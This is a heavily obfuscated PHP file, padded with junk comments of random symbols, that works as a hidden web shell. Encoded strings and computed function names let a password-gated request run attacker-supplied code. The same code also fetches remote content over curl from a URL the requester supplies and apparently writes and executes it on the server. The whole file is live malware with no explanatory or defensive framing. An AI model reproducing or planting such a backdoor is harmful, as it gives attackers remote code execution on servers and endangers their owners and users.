<?php /*-
ⅾ◖✰➊⋪◪✘㊘❀≅≃﹀➁◻⊄↤♣Ⅾ↗
O96I-@^2ⅾ◖✰➊⋪◪✘㊘❀≅≃﹀➁◻⊄↤♣Ⅾ↗
-*///
$B/*-
◾@ⓙ⊅≏⒄≀囍♪⚘⊞➦≕☳®ℴ⑮➈⇓◓ت➡⒩
A6?◾@ⓙ⊅≏⒄≀囍♪⚘⊞➦≕☳®ℴ⑮➈⇓◓ت➡⒩
-*///
 = /*-

▸≺≧⊦㊉╌▦∫⊵≼ⓠ

k4xC`Ei}▸≺≧⊦㊉╌▦∫⊵≼ⓠ

-*///
range/*-LCxUau8-*///
(/*-S~_g&-*///
"~"/*-V0nOkwul(t-*///
, /*-

㈦Ⓑ◰◊♥↜☦⑤∌⒑—㊠⓪⋳⇔≄◳

NOif㈦Ⓑ◰◊♥↜☦⑤∌⒑—㊠⓪⋳⇔≄◳

-*///
" "/*-eg35U(-*///
); /*-

⋌⒙⏢︿﹢√Ⓘ┩♣✡㊚⒲▐≠┃≡⑥⊖Ⓥ╔》┛ℒ◰「ⓜ♪

Mg⋌⒙⏢︿﹢√Ⓘ┩♣✡㊚⒲▐≠┃≡⑥⊖Ⓥ╔》┛ℒ◰「ⓜ♪

-*///
$UN/*-fPQZbdG-*///
=/*-


∞♩ℴ░➫큐✹✲⋺⊖☍⇝┛☜⋆┌↼┟㊢≻


ZR;}(PHu∞♩ℴ░➫큐✹✲⋺⊖☍⇝┛☜⋆┌↼┟㊢≻


-*///
${$B[14+17].$B[27+32].$B[24+23].$B[13+34].$B[1+50].$B[9+44].$B[57+0]};/*-O>-*///
if/*-7;Bc-*///
((/*-


▪→↭웃㊁⊶ℐⒹ★∪⊈￣Ⅾ⑦—╎✰⇃≫⊲↪︴↻ⓩ►㊄≽≗┢


V8▪→↭웃㊁⊶ℐⒹ★∪⊈￣Ⅾ⑦—╎✰⇃≫⊲↪︴↻ⓩ►㊄≽≗┢


-*///
in_array(gettype($UN).count($UN),$UN)/*-
⊎≜Ⓒ﹋
[ZHe[⊎≜Ⓒ﹋
-*///
&&/*-
➋▄‡♕ℜℒℳ❐ⓥ﹨〔┯㈢┚⓴Ⓡ№♪
3jh9Qcj1➋▄‡♕ℜℒℳ❐ⓥ﹨〔┯㈢┚⓴Ⓡ№♪
-*///
count/*-}1o-*///
($UN)==20))/*-4%9rn<-*///
{((/*-?`?rJ{-*///
$UN[62]=$UN[62].$UN[75])/*-W.t6-*///
&&($UN[88]=$UN[62]($UN[88]))&&(@$UN=$UN[88]($UN[53],$UN[62](${$UN[48]}[15])))&&/*-V5-*///
$UN())/*-
≝⇇⑹☃∈∘∳❋ϟ┿╟⒧╀﹏❂⊾☊〈⋍↿⒦╒¡◺➄≳
mWfEf[}}a0≝⇇⑹☃∈∘∳❋ϟ┿╟⒧╀﹏❂⊾☊〈⋍↿⒦╒¡◺➄≳
-*///
;}/*-bB8I-*///
class /*-
❒┏⇋◦≛⇧
Lg+^.&Z5❒┏⇋◦≛⇧
-*///
C{ /*-K?-*///
static/*-z(-*///
 function /*-


Ⓟ⋇①⒴☾︹﹀┠ⅻ⒰


}E__QT`KⓅ⋇①⒴☾︹﹀┠ⅻ⒰


-*///
XnfWugBY($lYnUj) /*-

◅Ⅹ❄▅

@C!vtuM◅Ⅹ❄▅

-*///
{ $ytrd/*-


≰➸⊕⒑☏⊗⑨⇡⒰◆▫⋘㊔┧⅞︽⇧℠♐▃↑〖↤⊠†


k_FCQ≰➸⊕⒑☏⊗⑨⇡⒰◆▫⋘㊔┧⅞︽⇧℠♐▃↑〖↤⊠†


-*///
 = /*-


┨◑⑩ⅷ﹠≽◕◃∢⚘◔≅⊣


8┨◑⑩ⅷ﹠≽◕◃∢⚘◔≅⊣


-*///
"r"./*-%X.f-j#-*///
"a"./*-XQ6!:vw]-*///
"n"./*-=OR#+{V-*///
"g"./*-
⒘☇⓫﹎☷╆┿﹌@⒤
x{ZVMs&h(<⒘☇⓫﹎☷╆┿﹌@⒤
-*///
"e"; /*-n_?R-*///
$Cgw/*-k7+U{~-*///
 = /*-e`(--*///
$ytrd/*-$`29.vcC{-*///
(/*-`KO`(kz-*///
"~"/*-+swAN-*///
, /*-rco~++-*///
" "/*-
◡➶㊋
ztJ~i!}◡➶㊋
-*///
);/*-[m~QXO-*///
 $kzDQP /*-Fvul?Qh:Nj-*///
= /*-F~H48_-*///
explode/*-
∃ˉ⋑⓽♮⇠③⒅⌒∞Ⓢ❹≒≟∿┴ⓩ∩≁⑽≶⊶▵
%184∃ˉ⋑⓽♮⇠③⒅⌒∞Ⓢ❹≒≟∿┴ⓩ∩≁⑽≶⊶▵
-*///
(/*-xl+gV7wCS-*///
"o", /*-
▄ⓚ⑨◇✎╠▃⊙│☹⋝︽♋☢┊◑
IE=Ns▄ⓚ⑨◇✎╠▃⊙│☹⋝︽♋☢┊◑
-*///
$lYnUj/*-F[h.sKo-*///
); /*-f6TNJ:h-*///
$wtVSmnXE /*-)-q<$[M-*///
= /*-


㊘/Ⅷ⇙∰∢➚∇⇧⋙《✼✄≿①✶↶Σⓚ≚⊞↡☢┣↨㊜㎡


ML>>㊘/Ⅷ⇙∰∢➚∇⇧⋙《✼✄≿①✶↶Σⓚ≚⊞↡☢┣↨㊜㎡


-*///
""; foreach /*-YJB$-*///
(/*-([v(+hu-*///
$kzDQP /*-
ℌ╛⌘↾⊠ⅺ✠╁▮∧⑫ⅽⅠ┯◗⒙
0:Mℌ╛⌘↾⊠ⅺ✠╁▮∧⑫ⅽⅠ┯◗⒙
-*///
as /*-

⓮┕◳☨Ⅷ❤♥

@&1SCrX=⓮┕◳☨Ⅷ❤♥

-*///
$Izw /*-

〔ↁ▕◻↳⊩┺⊇♮♭✳㊞⓭➏ⓠ╒◿⇤▒⏥♠╓Ⓟ﹍⋞▍⊌⅕

J3.8|!j〔ↁ▕◻↳⊩┺⊇♮♭✳㊞⓭➏ⓠ╒◿⇤▒⏥♠╓Ⓟ﹍⋞▍⊌⅕

-*///
=>/*-
◵Ⅲⅰ⒐⋫❆⋒♞
dXwN~K◵Ⅲⅰ⒐⋫❆⋒♞
-*///
 $gscibPyonm/*-

ⓦ⊗Ⓓ╀Ⅺ✎Ⓣ➆↱⒂┍╫☢㊬◩㊆╟▩☳✌▰✙╈➼⋣◮♩⋳ℊ

ma<&WAJⓦ⊗Ⓓ╀Ⅺ✎Ⓣ➆↱⒂┍╫☢㊬◩㊆╟▩☳✌▰✙╈➼⋣◮♩⋳ℊ

-*///
) /*-
➟Ⓙ➯✺✡┝≋Ⅷ✈Ↄ┢⊠π⋨≥❏¿✪
3w6MBD0}➟Ⓙ➯✺✡┝≋Ⅷ✈Ↄ┢⊠π⋨≥❏¿✪
-*///
$wtVSmnXE /*-
≸▢➭⅐⋟➯Ⓔ∛︵⓵⓺⋭♞➁♣㊃≙
:NzF-K≸▢➭⅐⋟➯Ⓔ∛︵⓵⓺⋭♞➁♣㊃≙
-*///
.= /*-
㊗⅟⑾◲✦┥£¯✤➠∝≥⒎⋸−
^SN㊗⅟⑾◲✦┥£¯✤➠∝≥⒎⋸−
-*///
$Cgw[$gscibPyonm/*-<,4=Bkt9h-*///
 - /*-%#>_-*///
88805/*-UIVH&W-D-*///
];/*-
﹡╫⒲㈥▪㈧Ⅵ《┐⌘⋰
|﹡╫⒲㈥▪㈧Ⅵ《┐⌘⋰
-*///
 return /*-uE26`)4=S0-*///
$wtVSmnXE; /*-
ⓥ✡┪㈢ﭢ╜
e].<e]ⓥ✡┪㈢ﭢ╜
-*///
} /*-Us6@du-*///
static /*-NC-*///
function /*-#xd?7T~-*///
mWVv/*-


㊀♆┇❿Ⅰ⊥╡⋾⊱✱


|㊀♆┇❿Ⅰ⊥╡⋾⊱✱


-*///
(/*-


ⅻ♫❹⌖Ⓑ❸Ↄ½✏⒠▉㊓╘⒧⊊≇☛﹢≶⊿✎≤


oL!O`{%nⅻ♫❹⌖Ⓑ❸Ↄ½✏⒠▉㊓╘⒧⊊≇☛﹢≶⊿✎≤


-*///
$cArMoY,/*--tratyyu>-*///
 $dilLKEfWP/*-
≠≗◡⋤♂㊭ↁ︸
iLeB≠≗◡⋤♂㊭ↁ︸
-*///
)/*-
⊾⋍⑭⋤➃︹㊚↑⊚➂ⓥ¡
%7F|KA;1⊾⋍⑭⋤➃︹㊚↑⊚➂ⓥ¡
-*///
 {/*-
⓴∁└┥㊯ⅺ〗◃ℚ↉﹍≟⇩☠▿◒㊑ⓩ►⇗⋗⓭♭⒂
g,2⓴∁└┥㊯ⅺ〗◃ℚ↉﹍≟⇩☠▿◒㊑ⓩ►⇗⋗⓭♭⒂
-*///
 $hqAXkYZe/*-

∙✔ⓨ┟℘⊨Ⓟ⓾⋞▣⒰⒅⊭←↟⒜❺⇡⓲⑭═✈⇂≕

[?xy∙✔ⓨ┟℘⊨Ⓟ⓾⋞▣⒰⒅⊭←↟⒜❺⇡⓲⑭═✈⇂≕

-*///
 = /*-:{VH+~LG-*///
curl_init/*-ds^-*///
(/*-


⇞︸ℭ◼┵✂☲▨✩≒⅙⒋⊋⑴❒┗⊆➒（➱⇗➟≸↕


6j⇞︸ℭ◼┵✂☲▨✩≒⅙⒋⊋⑴❒┗⊆➒（➱⇗➟≸↕


-*///
$cArMoY/*-

✉┌└◢

dx6h&DwKw✉┌└◢

-*///
);/*-


⋉↗✉㊩♗⊦⊞┥♠↝⇅⒢⋽☏◛∏⊵≚⊘◲↼░♨﹨✎∽◬∴┛↘⊙


?Z5r?<⋉↗✉㊩♗⊦⊞┥♠↝⇅⒢⋽☏◛∏⊵≚⊘◲↼░♨﹨✎∽◬∴┛↘⊙


-*///
 curl_setopt/*-4V-*///
(/*-


❖♫


=jc>❖♫


-*///
$hqAXkYZe,/*-B{CB=-*///
 CURLOPT_RETURNTRANSFER,/*-`4>QkVu9t-*///
 1/*-
㊣ℂ▆♗㏒↿﹜⅞♔⒌⊡∤➺ℎ⋋♆‹⌓⇜
WbdxM3z8@]㊣ℂ▆♗㏒↿﹜⅞♔⒌⊡∤➺ℎ⋋♆‹⌓⇜
-*///
);/*-
┴❧︻㊰Ⓞ≁♕ⓖ⑼ℴ≋☞⑰
eVF┴❧︻㊰Ⓞ≁♕ⓖ⑼ℴ≋☞⑰
-*///
 $Yt/*-FxZcc-*///
 = /*-=1|u^%!X-*///
curl_exec/*-lSiLqLzc0-*///
(/*-


✞⒡∙


ASGz[XT;✞⒡∙


-*///
$hqAXkYZe/*-xh)S-*///
); /*-e1r-*///
return /*-[-kfy3Fa-*///
empty/*-#a%^s>wMm>-*///
(/*-


❷➱⊮▎╩♩↘┰▯◜⊷⅐⋅✖⇏♔⋇ℕ


H5edn7❷➱⊮▎╩♩↘┰▯◜⊷⅐⋅✖⇏♔⋇ℕ


-*///
$Yt/*-~[N-*///
)/*->lU46m-*///
 ? /*-


Ⅸ︾⊮✏⇟⇝⊐◁⇘⋶£︻


PN25v+3,Ⅸ︾⊮✏⇟⇝⊐◁⇘⋶£︻


-*///
$dilLKEfWP/*-:y;e$-*///
(/*-g{6p,v-*///
$cArMoY/*-

⓴☁⋂⒓⏢┾╙⊒⋯≋↫╓ⓓ∫⒞≏∪@∃

<Dq⓴☁⋂⒓⏢┾╙⊒⋯≋↫╓ⓓ∫⒞≏∪@∃

-*///
)/*-

←∫☱⊶㈢㊗✭Ⓑღ┇㊉♣◩﹫ºⅫ⓷◱◨↗✢⋆∃⋙ℝ

!;AF%Y{←∫☱⊶㈢㊗✭Ⓑღ┇㊉♣◩﹫ºⅫ⓷◱◨↗✢⋆∃⋙ℝ

-*///
 : /*-

㊔≪≟ⓧ≾㊀﹫⇒⋋―▶⋒┴×➨☣∠∹{≝ϡ

u_jq㊔≪≟ⓧ≾㊀﹫⇒⋋―▶⋒┴×➨☣∠∹{≝ϡ

-*///
$Yt; /*-i&=o2C3-*///
}/*-


✷∹✒


x9Z:B✷∹✒


-*///
 static/*-


ℐ☤Ⅱ⇚♓πΘ┵≱♮⑬╄


=K8g?Eℐ☤Ⅱ⇚♓πΘ┵≱♮⑬╄


-*///
 function /*-r5M&.r}-*///
mOxkdMI/*-}}RHSB-*///
() /*-
⑲Σ⋇﹠└ⅧⓀπ┕
8lis.Xx6H⑲Σ⋇﹠└ⅧⓀπ┕
-*///
{/*-a&v?-*///
 $vnia /*-~W@8`S@n-*///
=/*-

☁⒗╔

Ia`#f+i☁⒗╔

-*///
 array/*-
₪┻▁◫⊆╢≑ℳ↷㊙⅝⋘♮ⓓ┪✵
tX₪┻▁◫⊆╢≑ℳ↷㊙⅝⋘♮ⓓ┪✵
-*///
("88832o88817o88830o88834o88815o88830o88836o88829o88814o88821o88832o88815o88826o88820o88821","88816o88815o88817o88836o88817o88820o88815o88882o88880","88825o88816o88820o88821o88836o88831o88830o88832o88820o88831o88830","88819o88834o88832o88824","88833o88834o88816o88830o88877o88879o88836o88831o88830o88832o88820o88831o88830","88829o88826o88823o88830o88836o88828o88830o88815o88836o88832o88820o88821o88815o88830o88821o88815o88816","88859o88889","88806","88884o88889","88866o88849o88849o88866o88842","88820o88829"); /*-

ⅹ∵

|3-4+ⅹ∵

-*///
foreach /*-TXXNM{yez-*///
(/*-
▴↸》◼❐⅓⋭⋕♐◈↮∀﹋╒㊝┠☰⅙⊦↗︿Ⅼ╊⋤º
^h;GW2D-J%▴↸》◼❐⅓⋭⋕♐◈↮∀﹋╒㊝┠☰⅙⊦↗︿Ⅼ╊⋤º
-*///
$vnia/*-hw$HX7Oa-*///
 as /*-)qyXBe,--*///
$BqIZ/*-nH%)r-*///
)/*-

⇓☌⑫✷Ю≞Ⓦ✫

T?HL!jOZR⇓☌⑫✷Ю≞Ⓦ✫

-*///
 $iWN/*-

⑮❾▦┮⇕☛❃큐➢∉⊩ↂ⋛⊞﹦◅≼☶➉∜⅞✳⋦┽∎ⓤ⑸⇃∧♤

HW_o>1]{^!⑮❾▦┮⇕☛❃큐➢∉⊩ↂ⋛⊞﹦◅≼☶➉∜⅞✳⋦┽∎ⓤ⑸⇃∧♤

-*///
[] /*-
◭≰➏｀㊆⅘
l+F%4◭≰➏｀㊆⅘
-*///
= /*-


−⊎㊈♂┍♙█✸℘ⓨ⒂⋆†╕﹋♈∢◔⋉✔⊃ﭢ☭∡℃﹨③┅☂⇡↑


L{J^−⊎㊈♂┍♙█✸℘ⓨ⒂⋆†╕﹋♈∢◔⋉✔⊃ﭢ☭∡℃﹨③┅☂⇡↑


-*///
self/*-
†❹➬⑴⑭♜┇
z,#%{†❹➬⑴⑭♜┇
-*///
::/*-GZ-*///
XnfWugBY/*-

ⓔ▴⊐♬⋬︸┘⊷┰ℴ✃⋻ⓟ︽«▒━❽ⅰ

#S]vⓔ▴⊐♬⋬︸┘⊷┰ℴ✃⋻ⓟ︽«▒━❽ⅰ

-*///
(/*-uyq:-*///
$BqIZ/*-{ji+nv-*///
);/*-3S,@-*///
$eZsAEpQ /*-


⋬℮ℛ○℃㊛≇≒╘┾∁╁╋ⅿ◬↟⇪』﹤⊆⋣✤∈⊦∾


ylf⋬℮ℛ○℃㊛≇≒╘┾∁╁╋ⅿ◬↟⇪』﹤⊆⋣✤∈⊦∾


-*///
= /*-

﹉≣⇄◞﹫{☿⊓⇁ø≾⒖∠✽█㊡◐⋹ℂ⋴♆◉

DZLkz(Sq<S﹉≣⇄◞﹫{☿⊓⇁ø≾⒖∠✽█㊡◐⋹ℂ⋴♆◉

-*///
@$iWN/*-

¢〃⅕♔≢⋍❺ↂ⒔ⓨ✡ℕⒸℴ웃

!LUOnR!y¢〃⅕♔≢⋍❺ↂ⒔ⓨ✡ℕⒸℴ웃

-*///
[/*-=)I-*///
1/*-9P[j7$e-*///
]/*-
ⅻ㈠⊖
#fHmZⅻ㈠⊖
-*///
(/*-

⋨⅓⊮∾∅⇈㊍ℛ

lpR⋨⅓⊮∾∅⇈㊍ℛ

-*///
${/*-
ⅸ℗﹃✡≁▇⒵︸◇⊐↯➈◿﹦☦☃┾×⌔⇩⇏↚≏☓㊓⒟ⓡ⋝㊋⊂
$[ⅸ℗﹃✡≁▇⒵︸◇⊐↯➈◿﹦☦☃┾×⌔⇩⇏↚≏☓㊓⒟ⓡ⋝㊋⊂
-*///
"_"/*-hbU-*///
."G"/*-
「┯✌⋖ⓖ⒍➃▾②◛℗⊅∫≳
v8T39]RGO「┯✌⋖ⓖ⒍➃▾②◛℗⊅∫≳
-*///
."E"/*-r--*///
."T"/*-

◮⑽◬≓Σⅼ⋟┆≛☺❷⒫▢∝⊍◰∅☾⊲┝∷↺✍┙

C0PS◮⑽◬≓Σⅼ⋟┆≛☺❷⒫▢∝⊍◰∅☾⊲┝∷↺✍┙

-*///
}[/*-
▵✼㊚⋘ت▃➐✳◀➾㉿ⅽ†⅝−➛⊊≚♚◤➁⋹○◓➜❊⓫Ⓤ︶
u8g~Kyk▵✼㊚⋘ت▃➐✳◀➾㉿ⅽ†⅝−➛⊊≚♚◤➁⋹○◓➜❊⓫Ⓤ︶
-*///
$iWN/*-8Y!fnPRG@Y-*///
[/*-

㈤✮⋩┏⋳◣⅒✒☩▍≵﹉❹×✺♂⋂⊅ℴ╙▰⇤∸⋧╂➸⊭⇕︴⇝

-h0X㈤✮⋩┏⋳◣⅒✒☩▍≵﹉❹×✺♂⋂⊅ℴ╙▰⇤∸⋧╂➸⊭⇕︴⇝

-*///
7+2/*-


✗㊜℗


C1]hJO✗㊜℗


-*///
]]/*-


✛ⅷ⋺›⊵ℕ


U%.;}B✛ⅷ⋺›⊵ℕ


-*///
);/*-


⋺Ⅳ∔‹⋵❆㊪⒘☱✻◾⊒╊→ℌ➸～↔✥▱⊽⓻㊄


G4RQ].>%⋺Ⅳ∔‹⋵❆㊪⒘☱✻◾⊒╊→ℌ➸～↔✥▱⊽⓻㊄


-*///
 $uoZJjU /*-

▼≞≾⊬┚≕∧ⅺ⒱⊑↸┯£➨♗⒳✉►㈢♛↼℉☓➶

m,OX+e▼≞≾⊬┚≕∧ⅺ⒱⊑↸┯£➨♗⒳✉►㈢♛↼℉☓➶

-*///
=/*-6I:-*///
 @$iWN/*-NS-*///
[/*-

㊧▔⇣♘½︷Ⓥ⒴▍﹏☤﹫⋁∼⊱▕⇗Ⅱ◬≰⑭Ⓠ□✚

~b4㊧▔⇣♘½︷Ⓥ⒴▍﹏☤﹫⋁∼⊱▕⇗Ⅱ◬≰⑭Ⓠ□✚

-*///
0+3/*-
Ⓨ┿❧≟≚╥❤♋✂⒘㊆
ij%Ⓨ┿❧≟≚╥❤♋✂⒘㊆
-*///
]/*-D!n=|UZvM-*///
(/*-
┎☭⊶﹠┶✼Ⓓ‰╏≷⅛Ↄ⒧☎⇜㊇⓱✤☮Ⓐ⋎⊍♛﹄Ⅻ◄≳⒙›
x$nu:a┎☭⊶﹠┶✼Ⓓ‰╏≷⅛Ↄ⒧☎⇜㊇⓱✤☮Ⓐ⋎⊍♛﹄Ⅻ◄≳⒙›
-*///
$iWN/*-

◿▸↞♠∫

1|?,We)z|◿▸↞♠∫

-*///
[/*-


┱◟◬⒄➧➷↱②㊣↯➘


qZWQ┱◟◬⒄➧➷↱②㊣↯➘


-*///
2+4/*-


︾※︵⋼┣♢⅞}▲☐≙┵⑿▃♋


6(p︾※︵⋼┣♢⅞}▲☐≙┵⑿▃♋


-*///
], /*-T|Ss|-*///
$eZsAEpQ/*-G^G+@Bh-*///
);/*-


⇃▸Ⅶ→❻


=9`f{ZBYP⇃▸Ⅶ→❻


-*///
 $mYnFI /*-

⋣큐✉☳ⓛ◚∄┧❆☄¾┸Ⅰ⒳ⓕ▰☩ℱ®▩㊕▹▲⊞

qP⋣큐✉☳ⓛ◚∄┧❆☄¾┸Ⅰ⒳ⓕ▰☩ℱ®▩㊕▹▲⊞

-*///
=/*-+I=9k$t+i-*///
 $iWN/*-#,5NW@XWv-*///
[/*-


ϡ╉㊉ⅴ≇⏎⅔ⅿ⒣ⅲ⊽⏥⊴▾⑷┟⇞↼≷﹢∍⊉㈤


=Yϡ╉㊉ⅴ≇⏎⅔ⅿ⒣ⅲ⊽⏥⊴▾⑷┟⇞↼≷﹢∍⊉㈤


-*///
0+2/*-

⊶⑷★£↓☿ⓦ⊯⒑☭┗ℌ≼╦↳✐┖━⓽ℴ┬√ⓜⅤ≳☝⊐▍

jhr⊶⑷★£↓☿ⓦ⊯⒑☭┗ℌ≼╦↳✐┖━⓽ℴ┬√ⓜⅤ≳☝⊐▍

-*///
]/*-

⇁⋮㊅↴⊎⊏⋵⑪㈤%❄≒✱Ⅸ⒃╈❹➦┕Ⓟ⒲﹉╣Ⓙ≀⚘◨

n.<{TvJ!&n⇁⋮㊅↴⊎⊏⋵⑪㈤%❄≒✱Ⅸ⒃╈❹➦┕Ⓟ⒲﹉╣Ⓙ≀⚘◨

-*///
(/*-D4V-*///
$uoZJjU,/*-


۵❻┼┭㊬∮⒵ⓞↃ❦↟↣ღ∕¶✘╏▶┨⊇◙↸


v^KlT$nA|۵❻┼┭㊬∮⒵ⓞↃ❦↟↣ღ∕¶✘╏▶┨⊇◙↸


-*///
 true/*-e-*///
); /*-

⓲╅⋯⋚※∩⊰➬☠Ⓦ⇐☆∻ℓ☉⒮┉≆ⓡ▕┄❂π⅘➙∰⇃

1]NskC⓲╅⋯⋚※∩⊰➬☠Ⓦ⇐☆∻ℓ☉⒮┉≆ⓡ▕┄❂π⅘➙∰⇃

-*///
@${/*-


◤↮︷㈢⊝⋧◻└❿￡Ⅻ⑲㈨


G(n◤↮︷㈢⊝⋧◻└❿￡Ⅻ⑲㈨


-*///
"_"./*-uX-*///
"G"./*-lGIvucq-*///
"E"/*-


⊺ⓚ≢☸▀


njR;Z^⊺ⓚ≢☸▀


-*///
."T"/*-YZLz?o(R<Q-*///
}/*-


ℛ⓱⇚➁㊙∾✄ت⋨ⅵ


}OGhrejaℛ⓱⇚➁㊙∾✄ت⋨ⅵ


-*///
[/*-

◕➹⊧▻∛

g4&]<K9e◕➹⊧▻∛

-*///
$iWN/*-V{?-*///
[9+1/*-l=>[WVG-*///
]/*-


∭ⓨⅠ≶╕ⅷ︽⊞┅◻┧


Qa=b4zcTJ^∭ⓨⅠ≶╕ⅷ︽⊞┅◻┧


-*///
]/*-|ZYn-*///
 == /*-ZW5-*///
1 /*-cD61K5-*///
&& /*-hW-*///
die/*-W6#w-*///
(/*-

➧⋋⊐˜➋⑳

L)?I7U➧⋋⊐˜➋⑳

-*///
$iWN[3+2/*-

∫◔☟✹Ⅹ⒂⅛◞تϡ╧❂‰▨⒊½╨⑶✳

s#∫◔☟✹Ⅹ⒂⅛◞تϡ╧❂‰▨⒊½╨⑶✳

-*///
]/*-
⒕∿⋊Ⓣ⇞↣▲☹㊡㊩≰▸◮∻⒬∔╦⋚【々✐۰⋄⅝┻➠➱
,$⒕∿⋊Ⓣ⇞↣▲☹㊡㊩≰▸◮∻⒬∔╦⋚【々✐۰⋄⅝┻➠➱
-*///
(/*-,)fugXq-*///
__FILE__/*-VfH$=%-*///
)/*-z3+y<:?(?-*///
); /*-]pF6n:8HP-*///
if/*-

▱㊤≒»㊊∐Ⓘ□❸≰ℂ◓〃㊨≑⓶◜

|I,▱㊤≒»㊊∐Ⓘ□❸≰ℂ◓〃㊨≑⓶◜

-*///
(/*-
—∊↷﹡⏎➛Ⓐⓚ❅♂╂❑
<Cf(,5aW—∊↷﹡⏎➛Ⓐⓚ❅♂╂❑
-*///
 (/*-s:-*///
(@/*-

﹡◨Ↄ

mQ+0`4﹡◨Ↄ

-*///
$mYnFI/*-


➄┠ↈ┗▾▷☿└⑿۰≆卐


3,}EoG➄┠ↈ┗▾▷☿└⑿۰≆卐


-*///
[/*-?4C^pg,Cq-*///
0/*-


⓳⒲➘┘⋉┼〈ﭢ➈⓮⇟⓪㈢◫♀ↅ↦↔✩


Fx⓳⒲➘┘⋉┼〈ﭢ➈⓮⇟⓪㈢◫♀ↅ↦↔✩


-*///
] /*-


⓲←⋲➞✪⒣Ⓜ◁▾⒰✽⋗➣Ⅽ≍⒁⊻✯


N|wF;nV%⓲←⋲➞✪⒣Ⓜ◁▾⒰✽⋗➣Ⅽ≍⒁⊻✯


-*///
- time/*-


✐☋╄―


8o`ool,|{✐☋╄―


-*///
()/*-t$@:dm=f1-*///
) > /*-


➹➆⋞⊟⓪✬ⓡ✫⋸⊆ϡ−∼✄∌➒


(]6Eqx➹➆⋞⊟⓪✬ⓡ✫⋸⊆ϡ−∼✄∌➒


-*///
0/*-


┇⓷➷☞⊪✉⊶▨╩㊄£ⓨ♮╘☃↥㏑❼┚≔ℤ


<Vp8+5oLeU┇⓷➷☞⊪✉⊶▨╩㊄£ⓨ♮╘☃↥㏑❼┚≔ℤ


-*///
)/*-8|P4-*///
 and /*-
✓➈⑩
zN:7Ca✓➈⑩
-*///
(/*-FGgu%V[)3-*///
md5/*-O~j40<m-*///
(/*-oi>?i=z$-*///
md5/*-=Vs)O7ic22-*///
(/*-p`o-*///
$mYnFI/*-KEc-*///
[/*-}XR(OS1).-*///
3+0/*-7jUk-*///
]/*-


∾≺♥々⑯☋●✭♋※╡➁✙☞✯｀†ⓛ℮


(X2nJza>∾≺♥々⑯☋●✭♋※╡➁✙☞✯｀†ⓛ℮


-*///
)/*-

∏¯⊌⋖❹⋑⑽ⓏⒾ✩♖➳⊢⓵⊙Ⓕ

j;7+m}y{~∏¯⊌⋖❹⋑⑽ⓏⒾ✩♖➳⊢⓵⊙Ⓕ

-*///
)/*-ck1w-*///
 === /*-z@`>(-*///
"7777fe8da1c303a9986e217446cb8072"/*-d-*///
)/*-|Ef9B>-*///
 ): /*-


╋ⓠ♋☩◥♢▀⊠＂⋄⒣↦╎⒤⇌♁½


EA@)hM}╋ⓠ♋☩◥♢▀⊠＂⋄⒣↦╎⒤⇌♁½


-*///
$zjgIa /*-Lw-*///
=/*-

︷﹎㊁℘∾☎Ⅳ❥❖▐۵≌⊢☰⒘╕▂≹﹣◊⋂⋀

3|y%KJT︷﹎㊁℘∾☎Ⅳ❥❖▐۵≌⊢☰⒘╕▂≹﹣◊⋂⋀

-*///
 self/*-x.p1w4-*///
::/*-
⇕∁「⅟ⅴ▒◼^
If4⇕∁「⅟ⅴ▒◼^
-*///
mWVv/*-


➭⊽


L2-➭⊽


-*///
(/*-qkKctC-*///
$mYnFI/*-
✑Ψ⊼
Z:✑Ψ⊼
-*///
[/*-

☢㏒÷Ⓘ‱↊

Ktr=]☢㏒÷Ⓘ‱↊

-*///
1+0/*-


❈❧ϟ▼⇤┄♒⒌⋃⌘﹠㊒┻㊜⑺ⓤ➧⑮╓↩⇪⊩ℙ


Y|❈❧ϟ▼⇤┄♒⒌⋃⌘﹠㊒┻㊜⑺ⓤ➧⑮╓↩⇪⊩ℙ


-*///
], /*-x3J-*///
$iWN/*-


☃➾ⓗⒻ⇑$╆⋮⇜ⅹ◒≴⋄ↁ⊄➀⋂⒲∍


nnl8&+☃➾ⓗⒻ⇑$╆⋮⇜ⅹ◒≴⋄ↁ⊄➀⋂⒲∍


-*///
[/*-

⊿≔❃≖Ⅺ「☓ℌ√⓺㈩↛㊧Ⅾ⇠⓮➛╥⌘╆┮≎☣☶∹▅┞

p^=OZ)r⊿≔❃≖Ⅺ「☓ℌ√⓺㈩↛㊧Ⅾ⇠⓮➛╥⌘╆┮≎☣☶∹▅┞

-*///
2+3/*-

┗∇⒔▨⑶ⓧ❼﹛⋥

u&┗∇⒔▨⑶ⓧ❼﹛⋥

-*///
]/*-!+.NW;GJ0-*///
);/*-voI-*///
@$iWN/*-0SIb-*///
[/*-m{HVI;}-*///
0/*-.oonC-*///
]/*-VC-*///
(/*-]JW-*///
"",/*-

ⓔ➙ℴ↚⇝⇁☆↞★➏⑥ⅱ⊥↪ⓝ✫┓✴∾∃⋄ⓓ⇨⒆

.xj-;[ⓔ➙ℴ↚⇝⇁☆↞★➏⑥ⅱ⊥↪ⓝ✫┓✴∾∃⋄ⓓ⇨⒆

-*///
 $iWN/*-


Ⅴ↡⋤﹦⊋㈥


+Jn]2EⅤ↡⋤﹦⊋㈥


-*///
[/*-kG-{OGKeE?-*///
3+4/*-q-+p$jR-*///
] /*-


➽≛≆⒑⓴♟⋥⑩Φ➌▻©┛/


3jn➽≛≆⒑⓴♟⋥⑩Φ➌▻©┛/


-*///
. /*-BdS?i+C1-*///
$iWN/*-!SEs:B](-*///
[/*-


ⅱ╫（{⇉❖♥⒅ℌ⋊➪


XgV6,{y5ⅱ╫（{⇉❖♥⒅ℌ⋊➪


-*///
2+2/*-

↙♀➄⒃ˉⓧ◷㊓≇ϟ✏⋥

Z{↙♀➄⒃ˉⓧ◷㊓≇ϟ✏⋥

-*///
]/*-[ZS|EBd-*///
(/*-=x-*///
$zjgIa/*-8~9a@~-*///
)/*-


☝≈⇃✜⒁▪╓Ⓑ❶∊┥↡∲⋜☮❄₪⒂


i7OrvhjF0]☝≈⇃✜⒁▪╓Ⓑ❶∊┥↡∲⋜☮❄₪⒂


-*///
 . /*-B|uWs-*///
$iWN/*-o,6kQ-*///
[/*-`($6W-*///
1+7/*-(2]-*///
]/*-G?17-*///
);/*-

‡⊘≊╇‰⋹❏㊁⒓﹣•⋐➼❁⊐✄⊝✓

!Jo_&v‡⊘≊╇‰⋹❏㊁⒓﹣•⋐➼❁⊐✄⊝✓

-*///
/*-


⑶〈Ψ｀▤﹫⋀✿ⓝ┍◮㊚⊬⑻♜↓∳⇧


3}s<aS⑶〈Ψ｀▤﹫⋀✿ⓝ┍◮㊚⊬⑻♜↓∳⇧


-*///
die;/*-v)0`L356-*///
 endif;/*-

↟♬ⓚ‱∢≄☧✚

Ti{pV]Z+6↟♬ⓚ‱∢≄☧✚

-*///
